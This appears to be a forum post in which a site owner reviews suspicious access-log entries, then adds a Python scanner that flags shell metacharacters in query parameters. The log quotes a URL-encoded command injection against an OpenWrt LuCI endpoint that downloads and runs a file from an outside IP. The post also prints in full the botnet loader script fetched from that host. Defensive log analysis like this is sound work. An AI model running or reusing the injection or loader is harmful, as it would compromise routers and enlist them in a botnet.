Found something quite interesting while checking the website logs

```
179.43.190.218 - - [18/Apr/2024:16:59:22 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1249 "-" "Go-http-client/1.1"
185.224.128.43 - - [18/Apr/2024:17:20:42 +0800] "GET / HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.112.213.23 - - [18/Apr/2024:17:41:47 +0800] "GET / HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36"
61.132.217.130 - - [18/Apr/2024:17:41:48 +0800] "GET /favicon.ico HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36"
61.132.217.130 - - [18/Apr/2024:17:41:48 +0800] "GET / HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36"
36.112.213.23 - - [18/Apr/2024:17:41:48 +0800] "GET /favicon.ico HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36"
83.97.73.245 - - [18/Apr/2024:17:59:26 +0800] "GET /actuator/gateway/routes HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.62.215.60 - - [18/Apr/2024:18:12:25 +0800] "GET / HTTP/1.1" 404 711 "-" "Go-http-client/1.1"
192.241.236.70 - - [18/Apr/2024:18:22:00 +0800] "GET /ReportServer HTTP/1.1" 404 711 "-" "Mozilla/5.0 zgrab/0.x"
45.56.108.128 - - [18/Apr/2024:18:38:42 +0800] "GET /systembc/password.php HTTP/1.0" 404 1249 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
```

The first line should be an attack aimed at OpenWrt; those of you running OpenWrt at home should be a bit careful.

The attacker also exposed their own server IP:

http://103.163.214.97/shk

Opening the address, the contents are as follows:

```
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.163.214.97"
binout="lib"
exec="your device just got infected to a bootnoot"

rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ "$status" = "$exec" ]; then
rm -rf $binout
break
fi
rm -rf $binout
done
```

Still the usual pattern of downloading a file and executing it; as for what it does after that, I have no idea.
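As an added example (not part of the original post), here is a small Python scanner that parses combined-format access log lines like the ones quoted above, URL-decodes every query parameter and flags values carrying shell metacharacters such as `$(`; on the first log line it recovers the injected command, including the download from 103.163.214.97. The first two sample lines are copied from the log above, the third benign line is constructed, and the regexes and function names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Sample entries: the first two are copied from the access log quoted above,
# the third is a constructed benign request for comparison.
SAMPLE_LOG = r'''179.43.190.218 - - [18/Apr/2024:16:59:22 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1249 "-" "Go-http-client/1.1"
83.97.73.245 - - [18/Apr/2024:17:59:26 +0800] "GET /actuator/gateway/routes HTTP/1.1" 404 711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.0.2.10 - - [18/Apr/2024:18:00:01 +0800] "GET /index.html?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'''

# Combined log format: ip ident user [time] "method target protocol" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')

# Shell metacharacters that have no business inside a form parameter value:
# command substitution, backticks, command separators and pipes.
SHELL_META_RE = re.compile(r'\$\(|`|;|\||&&')

def parse_line(line):
    """Split one combined-format access log line into its fields (None if it does not parse)."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def injected_commands(target):
    """Return (param, decoded value) pairs whose decoded value carries shell metacharacters."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SHELL_META_RE.search(value):
            hits.append((name, value))
    return hits

def scan_log(text):
    """Return one finding per request whose query parameters look like a command injection."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = injected_commands(entry["target"])
        if hits:
            findings.append({"ip": entry["ip"], "path": urlsplit(entry["target"]).path,
                             "agent": entry["agent"], "params": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} ({f['agent']})")
        for name, value in f["params"]:
            print(f"  {name} = {value}")
```

The `;` and `|` rules will also flag legitimate parameters that happen to contain those characters (free-text search fields, for example), so on a busy site restrict the scan to paths that should never receive them, such as the `/cgi-bin/luci/` path above.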

OK. Got it. It really is quite interesting.

Just block it and be done with it.